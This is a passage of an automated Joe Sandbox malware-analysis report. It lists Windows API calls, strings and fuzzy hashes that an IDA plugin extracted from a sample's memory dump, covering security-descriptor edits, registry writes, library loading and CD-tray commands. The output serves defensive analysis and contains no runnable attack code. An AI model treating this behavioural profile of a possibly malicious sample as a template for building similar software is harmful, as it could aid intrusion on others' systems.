                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65B13835A00209DFDB14DFA9DD45BAE7BB5EB48314F104229FA1AEB290D774E980CF61
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D41A60
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A6C
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A7B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D41A99
                                                                                                                                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D41741
                                                                                                                                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D41775
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00D4178C
                                                                                                                                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00D417C6
                                                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D417E2
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00D417F9
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00D41801
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00D41808
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D41829
                                                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00D41830
                                                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D4185F
                                                                                                                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D41881
                                                                                                                                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D41893
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D418BA
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D418C1
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D418CA
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D418D1
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D418DA
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D418E1
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00D418ED
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D418F4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41ADF: GetProcessHeap.KERNEL32(00000008,00D414FD,?,00000000,?,00D414FD,?), ref: 00D41AED
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00D414FD,?), ref: 00D41AF4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00D414FD,?), ref: 00D41B03
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                  • Opcode ID: 876e612d1be038ec3152d924cbf55ac4ff5069dde1450209091af8f1157faec4
                                                                                                                                                                                                                                                                  • Instruction ID: f3058e34558978ad5547d98299872b7f35494722366331c5c3ebcb644cf86da2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 876e612d1be038ec3152d924cbf55ac4ff5069dde1450209091af8f1157faec4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED713AB6D00209BBDF10DFA5DC45FAEBBB9BF44350F184125E919E6290E7319A85CB70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D6CF1D
                                                                                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00D7DCD0,00000000,?,00000000,?,?), ref: 00D6CFA4
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00D6D004
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6D054
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6D0CF
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00D6D112
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00D6D221
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00D6D2AD
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00D6D2E1
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00D6D2EE
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00D6D3C0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                  • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                  • Opcode ID: ef8deba2f8b65b0b7328476f257e77aac03cc338b98105ef419a98ab15f4e5bd
                                                                                                                                                                                                                                                                  • Instruction ID: 94db588c79a7c19555293923dbcdb37cd7daeb222ac13d895158e333ebf11b33
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef8deba2f8b65b0b7328476f257e77aac03cc338b98105ef419a98ab15f4e5bd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01126A356042419FCB14DF15C891B2AB7E6FF88714F08885CF88A9B3A2CB35ED45DBA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00D71462
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D7149D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D714F0
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D71526
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D715A2
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D7161D
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFFD52: _wcslen.LIBCMT ref: 00CFFD5D
                                                                                                                                                                                                                                                                    • Part of subcall function 00D43535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D43547
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                  • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                  • Opcode ID: 3ffd2299d3a281865298aa75512238f388b0d73c1bd6876dfa7196f63ada3bdc
                                                                                                                                                                                                                                                                  • Instruction ID: 4a037ed4046f472ca82711587d461d647aae257d0fbf617766a16732d3468905
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ffd2299d3a281865298aa75512238f388b0d73c1bd6876dfa7196f63ada3bdc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AE192396043419FC714DF29C45186AB7F2FF94314B188A5CF89A9B361EB30ED45DBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                  • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                  • Opcode ID: f765efca2f3d06a3df131281792cc204af84819f3328a8d99e9b1ab568a4a580
                                                                                                                                                                                                                                                                  • Instruction ID: c1dbae65150223dd934e4e5d0ebcb3c996b67fe01cdf8f5982ab90e73205f5ff
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f765efca2f3d06a3df131281792cc204af84819f3328a8d99e9b1ab568a4a580
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8710572F0016A8BCB109E7CED405BF33A3AF62758B290128FC569B294EA35DD45D7B1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D78DB5
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D78DC9
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D78DEC
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D78E0F
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00D78E4D
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00D76691), ref: 00D78EA9
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D78EE2
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00D78F25
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D78F5C
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00D78F68
                                                                                                                                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D78F78
                                                                                                                                                                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,00D76691), ref: 00D78F87
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D78FA4
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00D78FB0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                  • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                  • Opcode ID: a58a43f9d6ae116f478da223fcb90206bb1c8bd05c428783897a3d7b7ebfdb50
                                                                                                                                                                                                                                                                  • Instruction ID: 9a5a2e6553b68b5ddbd59b637df35d8e0e9bb991dd936d998a10712d2cd1b85f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a58a43f9d6ae116f478da223fcb90206bb1c8bd05c428783897a3d7b7ebfdb50
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7061E0B1940214BEEB149F64CC49FBEB7B8EF08B10F108106F919D61D1EB75A980EBB0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00D5493D
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D54948
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D5499F
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D549DD
                                                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00D54A1B
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D54A63
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D54A9E
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D54ACC
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                  • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                  • Opcode ID: 5f2dc14b45a828ca1793581181d91da9b809786b52e1786ce94eef649f117f6b
                                                                                                                                                                                                                                                                  • Instruction ID: 522a51321d133cca92e61ff2bc1e6b0a6f352877e1eab84bff1112c60cb6d066
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f2dc14b45a828ca1793581181d91da9b809786b52e1786ce94eef649f117f6b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8471D2726083019FCB10EF25C84196BB7E4EF94769F04492DFC9597261EB31DD89CBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00D46395
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00D463A7
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00D463BE
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00D463D3
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00D463D9
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00D463E9
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00D463EF
                                                                                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00D46410
                                                                                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00D4642A
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D46433
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4649A
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00D464D6
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D464DC
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00D464E3
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00D4653A
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00D46547
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 00D4656C
                                                                                                                                                                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00D46596
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 895679908-0
                                                                                                                                                                                                                                                                  • Opcode ID: 35c98c542fc7a60f27018db1fcbed8c562a6ead94d2de5b2781de65e789ca8cd
                                                                                                                                                                                                                                                                  • Instruction ID: 7759766691ae68461f580c191935af4416454889058b31a2d731e26c03012487
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35c98c542fc7a60f27018db1fcbed8c562a6ead94d2de5b2781de65e789ca8cd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23716E71900709AFDB20DFA8CE45AAEBBF5FF48704F144918E58BE26A0D775E944CB60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00D60884
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00D6088F
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00D6089A
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00D608A5
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00D608B0
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00D608BB
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00D608C6
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00D608D1
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00D608DC
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00D608E7
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00D608F2
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00D608FD
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00D60908
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00D60913
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00D6091E
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00D60929
                                                                                                                                                                                                                                                                  • GetCursorInfo.USER32(?), ref: 00D60939
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D6097B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4dbc657cecf0ed70c2d3e6b48598e4f5fa1c7646cc11154000c7be8bb22ef910
                                                                                                                                                                                                                                                                  • Instruction ID: 8f5cbe878f948b7f04f6e1a098dadbdba13ef6c8b99e7cc4dd7212adc97f7ac1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dbc657cecf0ed70c2d3e6b48598e4f5fa1c7646cc11154000c7be8bb22ef910
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C415470D483196BDB109FBA8C8585FBFE9FF04754B54452AE11CE7291DA78D801CFA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D00436
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00DB170C,00000FA0,AC4DA415,?,?,?,?,00D22733,000000FF), ref: 00D0048C
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00D22733,000000FF), ref: 00D00497
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00D22733,000000FF), ref: 00D004A8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D004BE
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D004CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D004DA
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D00505
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D00510
                                                                                                                                                                                                                                                                  • ___scrt_fastfail.LIBCMT ref: 00D00457
                                                                                                                                                                                                                                                                    • Part of subcall function 00D00413: __onexit.LIBCMT ref: 00D00419
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • WakeAllConditionVariable, xrefs: 00D004D2
                                                                                                                                                                                                                                                                  • InitializeConditionVariable, xrefs: 00D004B8
                                                                                                                                                                                                                                                                  • kernel32.dll, xrefs: 00D004A3
                                                                                                                                                                                                                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D00492
                                                                                                                                                                                                                                                                  • SleepConditionVariableCS, xrefs: 00D004C4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
